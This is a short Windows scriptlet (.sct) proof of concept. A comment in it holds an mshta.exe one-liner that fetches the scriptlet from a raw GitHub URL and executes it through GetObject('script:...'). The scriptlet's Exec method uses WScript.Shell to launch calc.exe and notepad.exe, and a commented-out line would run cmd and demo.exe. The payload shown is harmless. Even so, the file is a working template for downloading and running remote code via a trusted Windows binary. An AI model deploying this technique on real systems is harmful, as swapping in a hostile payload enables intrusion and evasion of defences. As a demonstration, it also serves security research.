<?XML version="1.0"?>
<scriptlet>
	<!-- POC -->
	<!-- mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/greycel/poc/master/calc.sct")).Exec();close(); -->
<registration  
description="Grey"       
progid="Grey"    
version="1.00"   
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" >
</registration>

<public>
    <method name="Exec"></method>
</public>


<script language="JScript">
<![CDATA[   
	function Exec()
	{
		//var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & demo.exe"); 
		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");		
	}		
]]>
</script>
</scriptlet>
